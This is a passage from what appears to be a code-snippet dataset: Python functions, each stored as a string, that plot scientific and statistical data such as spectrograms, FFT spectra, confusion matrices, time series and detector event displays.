% type(train_time))\n\n return plot_gat_times(self, train_time=train_time, title=title,\n xmin=xmin, xmax=xmax,\n ymin=ymin, ymax=ymax, ax=ax, show=show,\n color=color, xlabel=xlabel, ylabel=ylabel,\n legend=legend, chance=chance, label=label)", "def PlotTimes(metadata, data):\n\n gp = Gnuplot.Gnuplot(persist=1)\n gp('set data style impulses')\n gp('set xtics 1')\n gp.clear()\n gp.xlabel('seconds')\n gp.ylabel('duration in second')\n gp.title(metadata.AsTitle())\n styles = {}\n line_style = 1\n\n for dataset in data:\n x = numpy.array(dataset.time, dtype='float_')\n if not dataset.name in styles:\n styles[dataset.name] = line_style\n line_style += 1\n d = Gnuplot.Data(x, dataset.data,\n title=dataset.name,\n with_='impulses ls %d' % styles[dataset.name])\n else: # no need to repeat a title that exists already.\n d = Gnuplot.Data(x, dataset.data,\n with_='impulses ls %d' % styles[dataset.name])\n\n gp.replot(d)\n gp.hardcopy('/tmp/%s-%s-%f.png' %\n (metadata.name, metadata.kernel, metadata.duration),\n terminal='png')", "def heat_plot(matrix, filename, xTicks, yTicks, xLabel='X', yLabel='Y'):\n\tfig = plt.figure()\n\tax = fig.add_subplot(111)\n\tcax = ax.matshow(matrix, vmin=0, vmax=1)\n\tfig.colorbar(cax)\n\tticks = np.arange(0, matrix.shape[0], 1)\n\tax.set_xticks(ticks)\n\tax.set_yticks(ticks)\n\tax.set_xticklabels(xTicks)\n\tax.set_yticklabels(yTicks)\n\tax.set_xlabel(xLabel)\n\tax.set_ylabel(yLabel)\n\tplt.savefig(filename)\n\tplt.close()", "def plot1dim(i_dim):\n freq = plt.hist(x=x[:,i_dim], bins=min(100,4*self.grid_shape[i_dim]))[0]\n plt.plot(self.xg[i_dim][:,0],np.zeros(self.grid_shape[i_dim]) + 0.5*np.max(freq),'ko',markersize=3)\n plt.xlabel(r'x_%d'%i_dim)\n plt.ylabel('Frequency')\n plt.title('Dim %d, m = %d' % (i_dim, self.grid_shape[i_dim]))", "def plot_stft(arr, fs, nfft, noverlap):\n\n import matplotlib\n matplotlib.use('agg')\n from matplotlib.mlab import window_hanning, specgram\n\n import matplotlib.pyplot as plt\n\n fig = plt.figure()\n\n arr2D, freqs, bins = specgram(arr, Fs=fs, NFFT=nfft, noverlap=noverlap, window=window_hanning)\n\n # comment this line\n #plt.axis('off')\n axes = plt.gca()\n\n # change this line for y axis control\n axes.set_ylim([1000, 0])\n\n extent = (bins[0],bins[-1]*1024,freqs[-1],freqs[0])\n im = plt.imshow(arr2D,aspect='auto',extent = extent,interpolation=\"none\")\n plt.gca().invert_yaxis()\n\n # comment this line\n #plt.tight_layout(pad=0)\n # comment this line\n plt.colorbar()\n\n # flush draw commands\n fig.canvas.draw()\n\n # Now we can save it to a numpy array.\n data = np.frombuffer(fig.canvas.tostring_rgb(), dtype=np.uint8)\n data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,))\n\n plt.close()\n\n # transpose to BGR\n return data[..., ::-1]", "def plot_time(self, X, x0, t):\n\n Pressure = [Solution(self, (x-x0)/t).pressure for x in X]\n Velocity = [Solution(self, (x-x0)/t).velocity for x in X]\n Density = [Solution(self, (x-x0)/t).rho for x in X]\n\n fig, axs = plt.subplots(3, sharex=True)\n fig.suptitle(\"Solution of the Riemann problem\\nat t = {}s\".format(t))\n axs[0].plot(X, Density)\n axs[1].plot(X, Velocity)\n axs[2].plot(X, Pressure)\n\n axs[0].grid()\n axs[0].set(ylabel = \"Density\")\n axs[1].grid()\n axs[1].set(ylabel = \"Velocity\")\n axs[2].grid()\n axs[2].set(ylabel = \"Pressure\")\n\n plt.xlabel(\"Location x\")", "def show_confusion_matrix(matrix: List[List], labels: List[str]):\n fig, ax = plt.subplots()\n fig.set_figheight(15)\n fig.set_figwidth(15)\n\n min_val, max_val = 0, len(labels)\n\n for i in 
range(max_val):\n for j in range(max_val):\n c = matrix[i][j]\n ax.text(i, j, str(int(c)), va='center', ha='center')\n\n ax.matshow(matrix, cmap=plt.cm.Blues)\n\n # Set number of ticks for x-axis\n ax.set_xticks(np.arange(max_val))\n # Set ticks labels for x-axis\n ax.set_xticklabels(labels, rotation='vertical', fontsize=16)\n\n # Set number of ticks for x-axis\n ax.set_yticks(np.arange(max_val))\n # Set ticks labels for x-axis\n ax.set_yticklabels(labels, rotation='horizontal', fontsize=16)\n \n #ax.set_xlim(min_val, max_val)\n ax.set_ylim(max_val - 0.5, min_val - 0.5)\n plt.show()", "def draw_spectrum(msm):\n # eigenvalues of T sorted by the size\n length = min(len(msm.eigenv), 10) \n a = msm.eigenv[0:length]\n #a = sorted(W, reverse=True, key=lambda x: abs(x))[0:length]\n time = msm.timescales[0:length]\n x = np.arange(1.0,11.0,1.0)[0:length]\n\n # Define limits of the graph\n xmin = 0.7\n xmax = 10.3\n ymin = -0.1\n ymax = 1.1\n\n # Plot the ten biggest eigenvalues:\n ax1 = plt.subplot(111)\n plt.plot(x,a, 'ro', alpha=0.7, ms=8)\n plt.vlines(x,0,a)\n plt.xlabel('Index i', fontsize=12)\n ax1.set_ylabel(r'Eigenvalue $\\lambda_i$', fontsize=12, color='r')\n for tl in ax1.get_yticklabels(): #set tick label color\n tl.set_color('r')\n ax1.xaxis.tick_bottom()\n ax1.yaxis.tick_left()\n plt.axis([xmin, xmax, ymin, ymax])\n\n # add horizontal lines for orientation\n plt.axhline(linewidth=1, color='k')\n plt.axhline(y=1, linewidth=1, color='y')\n\n # plot timescales on the right y-axis:\n ax2 = plt.twinx()\n ax2.plot(x, time, 'bs', alpha=0.6, ms=6)\n #ax2.set_ylim([ymin, ymax])\n #ax2.set_yticks(time)\n #ax2.set_yticklabels([\"{0:0.2}\".format(timescale) for timescale in time])\n ax2.set_ylabel(r'Implied timescale $t_i$', fontsize=12, color='b')\n for tl in ax2.get_yticklabels():\n tl.set_color('b')\n ax2.yaxis.tick_right()\n\n plt.title('Eigenvalues and Implied Timescales', fontsize=16)\n\n plt.axis([xmin, xmax, 0., 1.05*time[1]])\n plt.show()", "def show():\n\tplt.show()", "def plot(self):\n\t\tself.plotOfSpect().plot()", "def show_plot(segment_times, sample_freqs, spec, wave, wav_data, vad_feat):\n plt.subplot(3, 1, 1)\n plt.pcolormesh(segment_times, sample_freqs, 10*np.log10(spec), cmap='jet')\n plt.ylabel('Frequency [Hz]')\n plt.xlabel('Time [sec]')\n\n plt.subplot(3,1,2)\n axes = plt.gca()\n axes.set_xlim([0, wave.duration])\n tmp_axis = np.linspace(0, wave.duration, wav_data.shape[0])\n plt.plot(tmp_axis, wav_data/np.abs(np.max(wav_data)))\n plt.xlabel('Time [sec]')\n\n plt.subplot(3,1,3)\n axes = plt.gca()\n axes.set_xlim([0, wave.duration])\n tmp_axis = np.linspace(0, wave.duration, vad_feat.shape[0])\n plt.plot(tmp_axis, vad_feat)\n plt.xlabel('Time [sec]')\n\n plt.savefig('test', bbox_inches='tight')", "def show_spectrum(h, title=\"\"):\n H = fft2(h)\n\n # Remember to plot the abs of the fft2(h)\n plt.imshow(np.abs(H))\n plt.gray()\n plt.title(title)\n plt.show()", "def plotting(self, figsize=(12, 12), types=['freqs']):\n ax = plt.figure(figsize=figsize)\n if 'freqs' in types:\n count_dict = self.count_freq(types=1)\n plt.title(\n f'Total keys in count_dict: {sum(list(count_dict.values()))}')\n barh = plt.barh(list(count_dict.keys()), list(count_dict.values()), color=[\n np.random.rand(3,) for _ in range(self.categories)])\n for rect in barh:\n height = rect.get_height()\n plt.text(rect.get_x() + rect.get_height()/2.0, height,\n '%d' % int(height), ha='center', va='bottom')\n\n plt.legend()\n plt.show()", "def generateFreqGraph( invertedIndex ):\n print('Printing plot for Step 3 
frequencies')\n print('----------------------------------------------------------------')\n tempList = sorted( invertedIndex, key=lambda element: element[1], reverse = True )\n freqDict = {}\n count = 1\n for term, freq in tempList:\n freqDict[count] = freq\n count+=1\n \n #Plot the frequency based graph\n plt.figure()\n plt.xlabel('$\\log_{10}(i)$ for $i^{th}$ most frequent term')\n plt.ylabel('$\\log_{10}(y_i)$ for freq of $i^{th}$ term')\n plt.title('$\\log_{10} y_i$ vs $\\log_{10}i$')\n plt.plot(np.log10(list(freqDict.keys())), np.log10(list(freqDict.values())), '-o')", "def plot2dTimeSeries(values, title='series', xLabel='time', yLabel='values', savePath='.'):\n plt.plot(values)\n plt.ylabel(yLabel)\n plt.xlabel(xLabel)\n plt.xticks(np.linspace(0, len(values), 11))\n plt.title(title)\n plt.savefig(f'{savePath}/{title}.png')\n plt.show(block=False)\n plt.pause(2)\n plt.close()", "def plot_fitter(self):\n\n total_time=self.interval*self.maxspectra\n times = np.linspace(self.interval,total_time + 1,self.interval)\n spectra_fitter.main(self.rt_plot.sum_data, times)", "def temporal_browser(Database, subjects=None, timescale = 'year'):\n QtWidgets.QApplication.setAttribute(QtCore.Qt.AA_EnableHighDpiScaling)\n if hasattr(QtWidgets.QStyleFactory, \"AA_UseHighDpiPixmaps\"):\n QtWidgets.QApplication.setAttribute(QtCore.Qt.AA_UseHighDpiPixmaps)\n app = QtWidgets.QApplication(sys.argv)\n ui3 = temporal_ui(Database, subjects, timescale)\n app.exec_()", "def plot_time_series(self, *args, **kwargs):\n return SimulationStaticVisualizer(self, *args, **kwargs)", "def matrix_callback(value):\n self.hitlet_points = self.hitlets_to_hv_points(self.hitlets_per_event[value],\n t_ref=self.event_df.loc[value, 'time']\n )\n\n # Create the hitlet matrix and time stream:\n self.hitlet_matrix = self.plot_hitlet_matrix(hitlets=None,\n _hitlet_points=self.hitlet_points)\n return self.hitlet_matrix", "def plot_matrix_method(pulse, trap, ToP):\n n0, d = trap.matrix_method(pulse)\n for k in range(len(d)):\n ave_list = []\n timestep = np.arange(0, trap.N+1, 1)\n for i in range(len(d[k])):\n sum2 = 0\n for j in range(len(d[k][i])):\n sum2 += (j) * d[k][i][j]\n ave_list.append(sum2)\n if ToP == 'a':\n plt.plot(timestep * pulse.t * 1e3, ave_list, label = pulse.t)\n if ToP == 'b':\n plt.plot(timestep * pulse.t * 1e3, ave_list, color = 'black', label = 'Matrix')\n if ToP == 'c':\n plt.plot(timestep * pulse.t * 1e3, ave_list, color = 'b')\n # plt.legend()\n # plt.xlabel('time (ms)')\n # plt.ylabel('n')\n #plt.xlim(0, 10) ", "def plot_message_counts(df, size=(20, 4), freq='d'):\n df_resampled = df.resample(freq)\n sns.set(rc={'figure.figsize': size})\n df_resampled.count().plot(linewidth=0.5)", "def plot_frequency(word_frequency, n, output_name=\"output.png\"):\r\n # partially completed for you, complete the rest according to the instructions.\r\n # setting up plot variables\r\n words = tuple(zip(*word_frequency))[0]\r\n frequencies = tuple(zip(*word_frequency))[1]\r\n y_pos = np.arange(len(words))\r\n fig, ax = plt.subplots(figsize=(15, 10))\r\n # set up color spectrum\r\n colors = [\r\n \"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"indigo\",\r\n \"violet\"\r\n ]\r\n rvb = mcolors.LinearSegmentedColormap.from_list(\"\", colors)\r\n nlist = np.arange(n).astype(float)\r\n ax.barh(y_pos, frequencies, align='center', color=rvb(nlist/n))\r\n ax.set_yticks(y_pos)\r\n ax.set_yticklabels(words)\r\n ax.invert_yaxis()\r\n ax.set_xlabel('Frequency')\r\n ax.set_title(\"Word Frequency: Top {}\".format(n))\r\n # Only comment 
below line when debugging. Uncomment when submitting\r\n plt.savefig(output_name)", "def plotFFT(filename):\n fs_rate, signal = wavfile.read(filename)\n len_audio = len(signal.shape)\n print(signal.shape)\n print(signal[:][0])\n if len_audio == 2:\n signal = signal.sum(axis=1) / 2\n N = signal.shape[0]\n FFT = abs(scipy.fft(signal))\n FFT_side = FFT[range(N//2)]\n freqs = scipy.fftpack.fftfreq(signal.size, 1.0/fs_rate)\n fft_freqs = np.array(freqs)\n freqs_side = freqs[range(N//2)] # one side frequency range\n plt.plot(freqs_side, abs(FFT_side), \"b\") # plotting the complete fft spectrum\n plt.xlabel('Frequency (Hz)')\n plt.ylabel('Single-sided Amplitude')\n plt.show()", "def plot_dataset(self):\n plt.plot(self.ground_truth, marker='o')\n plt.ylabel('Number of Topics')\n plt.xlabel('Window Number')\n plt.yticks(list(set(self.ground_truth)))\n plt.savefig(os.path.join(self.output_path, 'shift-plot.pdf'))", "def draw_spike_times(spike_times):\n for line in spike_times:\n plt.axvline(x=line, color='y')", "def plot_periodogram(trj, coord: str = \"y\", fs: int = 1, interactive: bool = True):\n from scipy import signal\n\n vals = trj[coord].values\n f, Pxx = signal.periodogram(vals, fs=fs, window=\"hanning\", scaling=\"spectrum\")\n plt.title(\"Power Spectrum\")\n plt.plot(f, Pxx)\n if interactive:\n plt.show()\n\n return plt.gcf()", "def show(self, fig=None):\n i = 0\n # for t = 0:obj.step_size:obj.duration\n # TODO: make a generator?\n iterator = np.linspace(0, self.duration(), num=math.ceil(self.duration() / self.step_precision) + 1)\n tfInterp_l = np.zeros((4, 4, len(iterator)))\n tfInterp_r = np.zeros((4, 4, len(iterator)))\n for t in iterator:\n [lfp, rfp] = self.footPosition(t)\n tfInterp_l[:, :, i] = lfp\n tfInterp_r[:, :, i] = rfp\n i = i + 1\n\n self.show_tf(fig, tfInterp_l, len(iterator))\n self.show_tf(fig, tfInterp_r, len(iterator))", "def plot_spectrum(data_path, save_path,\n title='k'):\n\n data = np.loadtxt(data_path,\n delimiter=TAB_DELIMITER,\n dtype=COUNT_DTYPE,\n skiprows=SKIPROW, usecols=COLS,)\n channels = data[:, 0]\n counts = data[:, 1]\n \n plt.figure()\n plt.plot(channels, counts,\"r.\")\n if title is not None:\n plt.title(data_path)\n plt.ylabel(\"Counts\")\n plt.xlabel(\"Channel\")\n plt.savefig(save_path, dpi=DPI)\n \n return", "def time_stats(df):\n\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n \n #adding histogram of times\n plt.hist(df['Start Time'].dt.hour, bins='auto', edgecolor='black')\n plt.title('Histogram of Travel Frequency by Hour')\n plt.xlabel('Hour of the Day')\n plt.ylabel('Count of Trips')\n plt.axis('tight')\n plt.grid()\n plt.show()\n \n # display the most common month\n popular_month = df['month'].mode()[0]\n print('Most Popular Month: \\n',cal.month_name[popular_month])\n\n # display the most common day of week\n popular_day = df['day'].mode()[0]\n print('Most Popular Day: \\n',popular_day )\n \n # display the most common start hour\n popular_hour = df['hour'].mode()[0]\n print('Most Popular Hour: \\n',popular_hour )\n \n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)", "def plt_spectrogram(X,win_length, hop_size, sample_rate, zoom_x=None, zoom_y=None,tick_labels='time-freq'):\n\n # Find the size of stft\n Nf,Nt=np.shape(X)\n\n # Compute the log magnitude spectrogram\n X=20*np.log10(np.abs(X))\n\n # Extract the first half of the spectrum for each time frame\n X=X[0:Nf/2]\n # Nf=np.shape(X)[0]\n #\n # # Generate time vector for plotting\n # 
times=(hop_size/float(sample_rate))*np.arange(Nt)\n #\n # # Generate frequency vector for plotting\n # freqs=(float(sample_rate)/win_length)*np.arange(Nf)\n #\n # # Generate time and frequency matrices for pcolormesh\n # times_matrix,freqs_matrix=np.meshgrid(times,freqs)\n # #\n # # Plot the log magnitude spectrogram\n # plt.title('Log magnitude spectrogram')\n # if tick_labels == 'bin-frame':\n # plt.pcolormesh(X)\n # plt.xlabel('Time-frame Number')\n # plt.ylabel('Frequency-bin Number')\n # else:\n # plt.pcolormesh(times_matrix,freqs_matrix,X)\n # plt.xlabel('Time (sec)')\n # plt.ylabel('Frequency (Hz)')\n #\n # # Zoom in on the plot if specified\n # if zoom_x is None and zoom_y is None:\n # plt.axis('tight')\n #\n # if zoom_x is not None:\n # plt.xlim(zoom_x)\n #\n # if zoom_y is not None:\n # plt.ylim(zoom_y)\n #\n return X", "def plotfreqs(file, type):\n \n ftitle = 'Frequencies ({0})'.format(type)\n \n d = genplotlib.gendict_freq(file)\n md = genplotlib.genlist(d)\n keylist = genplotlib.genkeylist(d)\n genplotlib.plotdata(d, md, keylist, 's', ftitle=ftitle, err='stdev', ylim=8, ylabel='Hz')\n name = 'pooled_freqs_{0}'.format(type)\n plt.savefig(name)", "def conf_matrix_plotter(model, X_t_vec, y_t):\n fig, ax = plt.subplots()\n\n fig.suptitle(str(model))\n\n plot_confusion_matrix(model, X_t_vec, y_t, ax=ax, cmap=\"plasma\");", "def visualize_signal(self):\n plt.figure()\n plt.title('Accelerometer Signal')\n plt.plot(range(len(self.data)), self.data[1])", "def plot(self, show=True):\n xs, ys = zip(*[(float(ix)/self.sample_rate, val)\n for ix, val in enumerate(self.samples)])\n plt.plot(xs, ys)\n if show:\n plt.show()", "def plot(self):\n\n import matplotlib.pyplot as plt\n plt.matshow(self.event_roll.T, cmap=plt.cm.gray, interpolation='nearest', aspect='auto')\n plt.show()", "def FourierRect(N):\n x = np.zeros((1,N))\n x[:,0:30]=1;\n x=x.flatten();\n \n \n #compute the DFT coefficients\n r1=FourierSeries(x)\n #magnitude of DFT coefficients\n a1=cabs(r1)\n\n #plot the time domain signal\n subplot(2,1,1)\n plt.plot(range(0,len(x)),x)\n xlabel('Time')\n ylabel('Amplitude')\n title('time doman')\n plt.ylim(-2,2);\n \n #plot the DFT coefficients\n L=len(a1);\n fr=np.arange(0,L);\n subplot(2,1,2)\n plt.stem(fr,a1,'r') # plotting the spectrum\n xlabel('Freq (Hz)')\n ylabel('|Y(freq)|')\n title('complete signal')\n ticks=np.arange(0,L+1,25);\n plt.xticks(ticks,ticks); \n show()", "def visualize(self, time, pred, true):\n plt.plot(time, true, label='Actual')\n plt.plot(time, pred, label='Predicted')\n plt.xlabel('Time')\n plt.ylabel('Price ($)')\n plt.legend(bbox_to_anchor=(0.1, 1), loc=2, borderaxespad=0.,\n prop={'size': 14})\n plt.show()", "def example3():\n arrive_time=example2() # Get packets arrive time using example1\n time_series.plot_time_series(arrive_time) # Plot time series using packets arrive time", "def plot_spectrum(sims, noise=False, maxtime=240):\n logging.log(15, \"starte plotting\")\n #ein Spektrum mit max 30 Chroms, gemeinsame Zeitenliste erstellen\n if len(sims) < 30:\n spectrum = [0,maxtime]\n #evtl Rauschen hinzufuegen\n if noise:\n for i in range(int(sims[0].number*len(sims)/10)):\n spectrum.append(random.uniform(0, maxtime))\n for sim in sims:\n for t in sim.times:\n if sim.pd[0] < 250:\n spectrum.append(t)\n hist, bins = np.histogram(spectrum, bins= maxtime, normed = True)\n offset = bins[1:]-bins[:-1]\n plt.plot(bins[:-1]+offset, hist, \"k\")\n #plt.ylim((0, 0.3))\n plt.xlim((0, maxtime))\n plt.xlabel(\"Retentionszeit/s\")\n plt.ylabel(\"Intensität\")\n title = 
\"Spektrum\"\n if noise:\n title += \" mit Rauschen\"\n plt.suptitle(title)\n plt.show()", "def plot_spectra(path):\r\n plt.figure(figsize=(20, 10))\r\n x, y= np.loadtxt(fname=path, delimiter='\\t',dtype=int,\r\n usecols = (1,2), skiprows=100, unpack = True)\r\n plt.plot(x, y)\r\n return plt.show()", "def plot_waveforms(cutouts, fs, pre, post, n=100, color='k', show=True):\n if n is None:\n n = cutouts.shape[0]\n n = min(n, cutouts.shape[0])\n time_in_us = np.arange(-pre*1000, post*1000, 1e3/fs)\n if show:\n _ = plt.figure(figsize=(10,6))\n\n for i in range(n):\n _ = plt.plot(time_in_us, cutouts[i,]*1e6, color, linewidth=1, alpha=0.3)\n _ = plt.xlabel('Time (ms)')\n _ = plt.ylabel('Voltage (mV)')\n _ = plt.title('Spike Waveforms')\n\n if show:\n plt.show()", "def data_vis():\n dataroot = 'solar_data.txt'\n debug = False \n diff = False\n X, y = read_data(dataroot, debug, diff)\n\n # First plot the original timeseries\n fig = plt.figure(figsize=(40,40))\n\n fig.add_subplot(3,3,1)\n plt.plot(y)\n plt.title('Avg Global PSP (vent/cor) [W/m^2]')\n # plt.show()\n\n fig.add_subplot(3,3,2)\n plt.plot(X[:,0])\n plt.title('Avg Zenith Angle [degrees]')\n # plt.show()\n\n fig.add_subplot(3,3,3)\n plt.plot(X[:,1])\n plt.title('Avg Azimuth Angle [degrees]')\n # plt.show()\n\n fig.add_subplot(3,3,4)\n plt.plot(X[:,2])\n plt.title('Avg Tower Dry Bulb Temp [deg C]')\n # plt.show()\n\n fig.add_subplot(3,3,5)\n plt.plot(X[:,3])\n plt.title('Avg Tower RH [%]')\n # plt.show()\n\n fig.add_subplot(3,3,6)\n plt.plot(X[:,4])\n plt.title('Avg Total Cloud Cover [%]')\n # plt.show()\n\n fig.add_subplot(3,3,7)\n plt.plot(X[:,5])\n plt.title('Avg Avg Wind Speed @ 6ft [m/s]')\n # plt.show()\n\n ##########################################################################################\n # Plotting the Fourier Transform of the signals\n\n freq = np.fft.fftfreq(len(y), 1*60*60)\n\n fig = plt.figure(figsize=(40,40))\n\n fig.add_subplot(3,3,1)\n plt.plot(freq, np.abs(np.fft.fft(y)))\n plt.title('Avg Global PSP (vent/cor) [W/m^2]')\n # plt.show()\n\n fig.add_subplot(3,3,2)\n plt.plot(freq, np.abs(np.fft.fft(X[:,0])))\n plt.title('Avg Zenith Angle [degrees]')\n # plt.show()\n\n fig.add_subplot(3,3,3)\n plt.plot(freq, np.abs(np.fft.fft(X[:,1])))\n plt.title('Avg Azimuth Angle [degrees]')\n # plt.show()\n\n fig.add_subplot(3,3,4)\n plt.plot(freq, np.abs(np.fft.fft(X[:,2])))\n plt.title('Avg Tower Dry Bulb Temp [deg C]')\n # plt.show()\n\n fig.add_subplot(3,3,5)\n plt.plot(freq, np.abs(np.fft.fft(X[:,3])))\n plt.title('Avg Tower RH [%]')\n # plt.show()\n\n fig.add_subplot(3,3,6)\n plt.plot(freq, np.abs(np.fft.fft(X[:,4])))\n plt.title('Avg Total Cloud Cover [%]')\n # plt.show()\n\n fig.add_subplot(3,3,7)\n plt.plot(freq, np.abs(np.fft.fft(X[:,5])))\n plt.title('Avg Avg Wind Speed @ 6ft [m/s]')\n # plt.show()\n\n ##################################################################################################\n # Print correlation matrix\n\n df = pd.DataFrame(np.c_[y, X])\n df.columns = ['Avg Global PSP (vent/cor) [W/m^2]','Avg Zenith Angle [degrees]','Avg Azimuth Angle [degrees]','Avg Tower Dry Bulb Temp [deg C]','Avg Tower RH [%]','Avg Total Cloud Cover [%]','Avg Avg Wind Speed @ 6ft [m/s]']\n f = plt.figure(figsize=(19, 15))\n plt.matshow(df.corr(), fignum=f.number)\n plt.xticks(range(df.shape[1]), df.columns, fontsize=14, rotation=20)\n plt.yticks(range(df.shape[1]), df.columns, fontsize=14)\n cb = plt.colorbar()\n cb.ax.tick_params(labelsize=14)\n plt.title('Correlation Matrix', fontsize=16);\n plt.show()", "def 
plot_firing_rates(self, t, mode='ON'):\n frs = self.data['FP'][0] / self.DT\n nn = self.L_N ** 2 * 2\n if mode == 'OFF':\n fr = frs[0: nn / 2, t]\n elif mode == 'ON':\n fr = frs[nn / 2: nn, t]\n else:\n raise ValueError('mode must be ON or OFF')\n\n plt.imshow(fr.reshape(self.L_N, self.L_N),\n interpolation='nearest',\n cmap=plt.cm.gray,\n vmin=0, vmax=100.)\n # t_str = ('lambda(t) (Hz) for {} Cells'.format(mode))\n # plt.title(t_str)", "def visualization(tv_summary, speech_summary, start, stop, mode='interactive'):\n\n # There was a problem with unicode to ascii errors cropping up again in matplotlib\n # TODO fix encoding errors for the following years\n skip_years = [1941, 1942, 1945, 1995, 2005, 2006, 2010, 2011]\n for start_year in [year for year in range(start, stop) if year not in skip_years]:\n print \"Creating figure for \" + str(start_year)\n heat_map, keywords = create_heat_map(source=tv_summary,\n response=speech_summary,\n max_keywords=45,\n start_year=start_year,\n interval=50)\n\n fig = plot_heat_map(heat_map, keywords, start_year)\n\n if mode == 'save':\n # Save fig to file\n fig.set_size_inches(11, 7.5)\n fig.savefig('output/output' + str(start_year) + '.png', dpi=100)\n else:\n plt.draw()\n if mode != 'save':\n plt.show()", "def plot_example_spectrograms(example,rate):\r\n plt.figure()\r\n \r\n ###YOUR CODE HERE\r\n y_lim = 40\r\n plt.title('Spectrogram')\r\n bin_space = 512 #30*rate # A typical window size is 30 seconds\r\n plt.subplot(411)\r\n plt.specgram(examples[0]/np.sum(examples[0]),NFFT=bin_space,Fs=srate)\r\n plt.ylim((0,y_lim))\r\n plt.title ('REM')\r\n plt.subplot(412)\r\n plt.title ('Stage 1 NREM')\r\n plt.specgram(examples[1]/np.sum(examples[1]),NFFT=bin_space,Fs=srate)\r\n plt.ylim((0,y_lim))\r\n plt.subplot(413)\r\n plt.title ('Stage 2 NREM')\r\n plt.specgram(examples[2]/np.sum(examples[2]),NFFT=bin_space,Fs=srate)\r\n plt.ylim((0,y_lim))\r\n plt.subplot(414)\r\n plt.title ('Stage 3/4 NREM')\r\n plt.specgram(examples[3]/np.sum(examples[3]),NFFT=bin_space,Fs=srate)\r\n plt.ylim((0,y_lim))\r\n plt.show();\r\n \r\n return", "def plot_hitlet_matrix(self, hitlets, _hitlet_points=None):\n if not _hitlet_points:\n _hitlet_points = self.hitlets_to_hv_points(hitlets, )\n\n hitlet_matrix = self._plot_base_matrix(_hitlet_points).opts(title='Hitlet Matrix',\n xlabel='Time [ns]',\n ylabel='PMT channel',\n ylim=(1995, 2125),\n color='area',\n clabel='Area [pe]',\n cmap='viridis',\n colorbar=True\n )\n return hitlet_matrix", "def plot_event_display(self):\n # First we have to define the python callbacks:\n def matrix_callback(value):\n \"\"\"\n Callback for the dynamic hitlet matrix. Changes polygons when a new\n event is selected.\n \"\"\"\n self.hitlet_points = self.hitlets_to_hv_points(self.hitlets_per_event[value],\n t_ref=self.event_df.loc[value, 'time']\n )\n\n # Create the hitlet matrix and time stream:\n self.hitlet_matrix = self.plot_hitlet_matrix(hitlets=None,\n _hitlet_points=self.hitlet_points)\n return self.hitlet_matrix\n\n def pattern_callback(value, x_range):\n \"\"\"\n Call back for the dynamic PMT pattern map. 
Depends on the selcted\n event as well as the selected x_range in the hitlet_matrix.\n \"\"\"\n # Get hitlet points and select only points within x_range:\n hit = self.hitlet_points.data\n if not x_range:\n time = hit['time'].values\n length = hit['length'].values\n dt = hit['dt'].values\n x_range = [min(time), max(time + (length * dt))]\n\n m = (hit['time'] >= x_range[0]) & (hit['time'] < x_range[1])\n\n hitlets_in_time = hit[m]\n new_points = self.hv.Points(hitlets_in_time)\n\n # Plot pmt pattern:\n pmts = self.plot_nveto(hitlets=None,\n _hitlet_points=new_points,\n pmt_size=8,\n pmt_distance=0.5)\n angle = self._plot_reconstructed_position(value)\n return angle * pmts\n\n self._make_sliders_and_tables(self.event_df)\n index = self.evt_sel_slid.value\n self.hitlet_points = self.hitlets_to_hv_points(self.hitlets_per_event[index],\n t_ref=self.event_df.loc[index, 'time'])\n\n dmap_hitlet_matrix = self.hv.DynamicMap(\n matrix_callback,\n streams=[self.evt_sel_slid.param.value]).opts(framewise=True)\n\n time_stream = self.hv.streams.RangeX(source=dmap_hitlet_matrix)\n\n dmap_pmts = self.hv.DynamicMap(\n pattern_callback,\n streams=[self.evt_sel_slid.param.value, time_stream])\n\n slider_column = pn.Column(self.evt_sel_slid,\n self.evt_sel_slid.controls(['value']),\n self.time_table)\n\n event_display = pn.Column(self.title_panel,\n pn.Row(slider_column, dmap_pmts, width_policy='max'),\n dmap_hitlet_matrix,\n self.prop_table,\n self.pos_table,\n width_policy='max')\n return event_display", "def visualise_hourly_arrivals_at_each_lab(tests_dataframe):\r\n labs_df = create_dataframe_from_csv('labs.csv')\r\n labs_df = drop_missing_values_in_dataframe(labs_df)\r\n list_of_labs = labs_df['lab_name'].to_list()\r\n for lab_name in list_of_labs:\r\n df = tests_dataframe.loc[tests_dataframe['lab_name'] == lab_name]\r\n df.time_test_arrives_lab = pd.to_datetime(df.time_test_arrives_lab)\r\n df = df.sort_values(by=\"time_test_arrives_lab\")\r\n df = df[['time_test_arrives_lab']]\r\n df = df.reset_index().set_index('time_test_arrives_lab')\r\n df = df.resample('H').count()\r\n df.plot(title = 'hourly arrivals at ' + lab_name)\r\n plt.show()", "def plotSpectrum(y,Fs):\n n = len(y) # length of the signal\n k = arange(n)\n T = n/Fs\n frq = k/T # two sides frequency range\n frq = frq[range(n/2)] # one side frequency range\n\n Y = fft(y)/n # fft computing and normalization\n Y = Y[range(n/2)]\n \n plt.plot(frq,abs(Y),'r') # plotting the spectrum\n xlabel('Freq (Hz)')\n ylabel('|Y(freq)|')", "def plot_weights_timeseries(weights, phases, output_file=None):\n\n n_components = weights.shape[1]\n\n fig, ax = plt.subplots(nrows=n_components, figsize=(9, 4 * n_components),\n sharex=True, squeeze=False)\n\n for i in range(n_components):\n ax[i, 0].plot(weights[:, i], '-')\n ax[i, 0].plot(phases, '-', color='gray', alpha=0.7)\n\n ax[i, 0].set_ylabel(r'$\\gamma_{:d}$'.format(i + 1))\n\n ax[i, 0].grid(ls='--', color='gray', alpha=0.5)\n\n if i == n_components - 1:\n ax[i, 0].set_xlabel('Time')\n\n if output_file is not None and output_file:\n plt.savefig(output_file, bbox_inches='tight')\n\n plt.show()", "def display_time_stats(self):\n\n self.time_frame = stat_display_labels(\n self.stats_frame,\n \"Time Stats\",\n [\n \"The busiest month was:\",\n \"The busiest day of the week was:\",\n \"The busiest start hour was:\",\n ],\n row=0,\n columnspan=2,\n )\n self.time_stats_data = tk.Label(self.time_frame, justify=\"left\")\n self.time_stats_data.grid(row=0, column=2)", "def plot_tcv(self):\n self.plot_profiles(0, 
